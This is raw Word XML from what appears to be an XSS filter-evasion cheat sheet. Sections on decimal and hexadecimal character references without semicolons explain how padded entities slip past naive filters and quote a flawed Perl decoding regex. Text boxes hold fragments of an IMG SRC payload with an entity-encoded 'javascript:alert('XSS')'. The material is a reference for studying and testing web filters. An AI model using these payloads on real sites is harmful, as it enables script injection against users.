                                <a:lnTo>
                                  <a:pt x="2922" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="291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" name="Text Box 133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4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40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;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35" o:spid="_x0000_s1101" style="width:147.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="294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">
                <v:shape id="Freeform 1337" o:spid="_x0000_s1102" style="position:absolute;width:2941;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="294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XSRcUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTUvDQBC9C/6HZQre7KYWpaTZFBEFEQ/aFNrjNDtN&#10;UrOzcXeTJv/eFQRv83ifk21G04qBnG8sK1jMExDEpdUNVwp2xcvtCoQPyBpby6RgIg+b/Poqw1Tb&#10;C3/SsA2ViCHsU1RQh9ClUvqyJoN+bjviyJ2sMxgidJXUDi8x3LTyLkkepMGGY0ONHT3VVH5te6Pg&#10;+9AP5VRM+1XRPh/78/vevX2wUjez8XENItAY/sV/7lcd5y+X9/D7TTxB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ddJFxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m2919,182l21,182r-3,l,161r,-3l,21,21,,2919,r21,21l2940,161r-18,21l2919,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2919,182;21,182;18,182;0,161;0,158;0,21;21,0;2919,0;2940,21;2940,161;2922,182;2919,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1336" o:spid="_x0000_s1103" type="#_x0000_t202" style="position:absolute;width:294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T3lsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflin0VjdWCDW6EZEWCkIxxkOP0+wk&#10;WczOxuxW47/vCgVv83ifs1yNthNnGrxxrGA6SUAQV04bbhQcyo+XNxA+IGvsHJOCK3lY5Y8PS8y0&#10;u3BB531oRAxhn6GCNoQ+k9JXLVn0E9cTR652g8UQ4dBIPeAlhttOviZJKi0ajg0t9rRpqTruf62C&#10;9TcX7+b09bMr6sKU5TzhbXpU6vlpXC9ABBrDXfzv/tRx/myWwu2beIL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095b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40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;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4"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="101"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Decimal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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Character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>References</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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Trailing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Semicolons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before="1" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="349"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This is often effective in XSS that attempts to look for "&amp;#XX;", since most people don't know about padding - up to 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>numeric characters total. This is als</w:t>
      </w:r>
      <w:r>
        <w:t>o useful against people who decode against strings like $tmp_string =\~ s/.*\&amp;#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a HTML encoded string (I've seen this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wild):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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5509260" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1331" name="Group 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9260" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="8676" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1332" name="Freeform 1334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8676" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 10268 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 8676"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8676"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8676"/>
                              <a:gd name="T10" fmla="+- 0 347 166"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8676"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8676"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8676"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8676"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 10268 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8676"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 10289 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8676"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 10289 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8676"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 10272 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8676"/>
                              <a:gd name="T42" fmla="+- 0 347 166"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 10268 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8676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676" h="183">
                                <a:moveTo>
                                  <a:pt x="865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54" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8675" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8675" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8658" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="865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" name="Text Box 133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867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8"/>
                                  <w:sz w:val="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SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000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097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0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32" o:spid="_x0000_s1104" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:433.8pt;height:9.15pt;z-index:-15714816;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="867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">
                <v:shape id="Freeform 1334" o:spid="_x0000_s1105" style="position:absolute;left:1614;top:165;width:8676;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="86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viZsIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+L/gfwgheFk1VVqQaxdeCx62K57EZ29Jm&#10;Upuo3X9vFha8zcf3nPmyNZV4UOMKywqGgwgEcWp1wZmC0/G7PwXhPLLGyjIp+CUHy0XnY46xtk9O&#10;6HHwmQgh7GJUkHtfx1K6NCeDbmBr4sBdbWPQB9hkUjf4DOGmkqMomkiDBYeGHGva5JSWh7tRkP6U&#10;n8fzrTTust353bZYb5KvRKlet13NQHhq/Vv8797rMH88HsHfN+EE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K+JmwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m8654,182l21,182r-3,-1l,161r,-3l,21,21,,8654,r21,21l8675,161r-17,20l8654,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8654,348;21,348;18,347;0,327;0,324;0,187;21,166;8654,166;8675,187;8675,327;8658,347;8654,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1333" o:spid="_x0000_s1106" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:867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NUDsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflin0Vjc2IBrdiEgLhYI0xkOP0+wk&#10;WczOxuxW03/vFgRv83ifs1qPthNnGrxxrGA6SUAQV04bbhQcyveXOQgfkDV2jknBH3lY548PK8y0&#10;u3BB531oRAxhn6GCNoQ+k9JXLVn0E9cTR652g8UQ4dBIPeAlhttOvibJTFo0HBta7GnbUnXc/1oF&#10;m28u3sxp9/NV1IUpy0XCn7OjUs9P42YJItAY7uKb+0PH+Wmawv838QS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DVA7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78"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 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SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000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097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0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8"/>
        <w:rPr>
          <w:sz w:val="4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5563235" cy="116205"/>
                <wp:effectExtent l="5715" t="5080" r="3175" b="2540"/>
                <wp:docPr id="1328" name="Group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3235" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8761" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1329" name="Freeform 13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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 8761"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 8761"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 8761"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 8761"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 8761"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 8761"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 8742 w 8761"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 8739 w 8761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761" h="183">
                                <a:moveTo>
                                  <a:pt x="873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739" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8742" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="87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" name="Text Box 133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000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#00000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29" o:spid="_x0000_s1107" style="width:438.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="876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">
                <v:shape id="Freeform 1331" o:spid="_x0000_s1108" style="position:absolute;width:8761;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="876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qK98AA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPzWrCQBC+F3yHZQRvdaOWotFVVBA8lTb6AEN2TIKZ&#10;2SW7anx7t1DobT6+31ltem7VnbrQODEwGWegSEpnG6kMnE+H9zmoEFEstk7IwJMCbNaDtxXm1j3k&#10;h+5FrFQKkZCjgTpGn2sdypoYw9h5ksRdXMcYE+wqbTt8pHBu9TTLPjVjI6mhRk/7msprcWMD2nv+&#10;Lj92GVezK1+K8NWcD2TMaNhvl6Ai9fFf/Oc+2jR/Nl3A7zfpBL1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CqK98AAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" path="m8739,182l21,182r-3,l,161r,-3l,21,21,,8739,r21,21l8760,161r-18,21l8739,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8739,182;21,182;18,182;0,161;0,158;0,21;21,0;8739,0;8760,21;8760,161;8742,182;8739,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1330" o:spid="_x0000_s1109" type="#_x0000_t202" style="position:absolute;width:876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KecYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UKvdWNClKjq0hRKBSKMR56nGbH&#10;ZDE7m2ZXTf995yD0NsN78943y/XgW3WlPrrABsajDBRxFazj2sCx3L28gooJ2WIbmAz8UoT16vFh&#10;ibkNNy7oeki1khCOORpoUupyrWPVkMc4Ch2xaKfQe0yy9rW2Pd4k3Ld6kmUz7dGxNDTY0VtD1flw&#10;8QY2X1xs3c/n9744Fa4s5xl/zM7GPD8NmwWoREP6N9+v363gT6fCL9/IC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HKec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000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#00000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1"/>
        <w:rPr>
          <w:sz w:val="6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687070" cy="116205"/>
                <wp:effectExtent l="5715" t="5080" r="2540" b="2540"/>
                <wp:docPr id="1325" name="Group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070" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1326" name="Freeform 13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82" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 1060 w 1082"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 1082"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 1082"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 1082"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 1082"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 1082"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 1082"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 1060 w 1082"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 1081 w 1082"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 1081 w 1082"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 1063 w 1082"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 1060 w 1082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082" h="183">
                                <a:moveTo>
                                  <a:pt x="106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060" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1081" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1081" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1063" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106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" name="Text Box 132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39&amp;#0000041&gt;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26" o:spid="_x0000_s1110" style="width:54.1pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="108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">
                <v:shape id="Freeform 1328" o:spid="_x0000_s1111" style="position:absolute;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="108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KgB8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQRvNVsFWbZGsYIi2EOrXnobNrOb&#10;xc1kSeK69tc3hUJv83ifs1wPthU9+dA4VvAyzUAQl043XCu4nHfPOYgQkTW2jknBgwKsV6OnJRba&#10;3fmT+lOsRQrhUKACE2NXSBlKQxbD1HXEiauctxgT9LXUHu8p3LZylmULabHh1GCwo62h8nq6WQW1&#10;3b/Z3bHKzfsF/ffto8/nX5VSk/GweQURaYj/4j/3Qaf589kCfr9JJ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CoAfEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1060,182l21,182r-3,l,161r,-3l,21,21,,1060,r21,21l1081,161r-18,21l1060,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1060,182;21,182;18,182;0,161;0,158;0,21;21,0;1060,0;1081,21;1081,161;1063,182;1060,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1327" o:spid="_x0000_s1112" type="#_x0000_t202" style="position:absolute;width:108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HE0MQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflil4q5sqaE2zipQWhII0xoPHMTtJ&#10;FrOzaXbV9N+7BaG3ebzPyVaDbcWFem8cK3gZJyCIS6cN1wr2xefzKwgfkDW2jknBL3lYLR8fMky1&#10;u3JOl12oRQxhn6KCJoQuldKXDVn0Y9cRR65yvcUQYV9L3eM1httWTpJkJi0ajg0NdvTeUHnana2C&#10;9YHzD/OzPX7nVW6KYpHw1+yk1OhpWL+BCDSEf/HdvdFx/nQyh79v4gl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hxND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39&amp;#0000041&gt;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4"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="101"/>
      </w:pPr>
      <w:r>
        <w:t>Hexadecimal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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Character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>References</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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Trailing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Semicolons</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="210"/>
      </w:pPr>
      <w:r>
        <w:t>This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viable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>against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above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$tmp_string=\~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>s/.*\&amp;#(\d+);.*/$1/;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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assumes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there</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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numeric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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pound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>symbol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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true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hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>characters).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="11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112395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="316865" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1322" name="Group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865" cy="116205"/>
                          <a:chOff x="1614" y="177"/>
                          <a:chExt cx="499" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1323" name="Freeform 1325"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="177"/>
                            <a:ext cx="499" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2091 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 499"/>
                              <a:gd name="T2" fmla="+- 0 359 177"/>
                              <a:gd name="T3" fmla="*/ 359 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 499"/>
                              <a:gd name="T6" fmla="+- 0 359 177"/>
                              <a:gd name="T7" fmla="*/ 359 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 499"/>
                              <a:gd name="T10" fmla="+- 0 359 177"/>
                              <a:gd name="T11" fmla="*/ 359 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 499"/>
                              <a:gd name="T14" fmla="+- 0 338 177"/>
                              <a:gd name="T15" fmla="*/ 338 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 499"/>
                              <a:gd name="T18" fmla="+- 0 335 177"/>
                              <a:gd name="T19" fmla="*/ 335 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 499"/>
                              <a:gd name="T22" fmla="+- 0 198 177"/>
                              <a:gd name="T23" fmla="*/ 198 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 499"/>
                              <a:gd name="T26" fmla="+- 0 177 177"/>
                              <a:gd name="T27" fmla="*/ 177 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2091 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 499"/>
                              <a:gd name="T30" fmla="+- 0 177 177"/>
                              <a:gd name="T31" fmla="*/ 177 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2113 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 499"/>
                              <a:gd name="T34" fmla="+- 0 198 177"/>
                              <a:gd name="T35" fmla="*/ 198 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2113 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 499"/>
                              <a:gd name="T38" fmla="+- 0 338 177"/>
                              <a:gd name="T39" fmla="*/ 338 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2095 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 499"/>
                              <a:gd name="T42" fmla="+- 0 359 177"/>
                              <a:gd name="T43" fmla="*/ 359 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2091 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 499"/>
                              <a:gd name="T46" fmla="+- 0 359 177"/>
                              <a:gd name="T47" fmla="*/ 35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99" h="183">
                                <a:moveTo>
                                  <a:pt x="477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77" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="499" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="499" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="481" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="47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" name="Text Box 1324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77"/>
                            <a:ext cx="49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&lt;IMG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23" o:spid="_x0000_s1113" style="position:absolute;margin-left:80.7pt;margin-top:8.85pt;width:24.95pt;height:9.15pt;z-index:-15713280;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,177" coordsize="49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">
                <v:shape id="Freeform 1325" o:spid="_x0000_s1114" style="position:absolute;left:1614;top:177;width:499;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="49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wprMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPywje6sYHJY3ZiIiSIr3U9tLbkB2T&#10;xexsyK4a/fXdQqG3+fiek68H24or9d44VjCbJiCIK6cN1wq+PvfPKQgfkDW2jknBnTysi9FTjpl2&#10;N/6g6zHUIoawz1BBE0KXSemrhiz6qeuII3dyvcUQYV9L3eMthttWzpPkRVo0HBsa7GjbUHU+XqyC&#10;9vS+3JXfh/T1sPQ7Y7ryYdNSqcl42KxABBrCv/jP/abj/MV8Ab/fxBN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MKazEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m477,182r-456,l18,182,,161r,-3l,21,21,,477,r22,21l499,161r-18,21l477,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="477,359;21,359;18,359;0,338;0,335;0,198;21,177;477,177;499,198;499,338;481,359;477,359" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
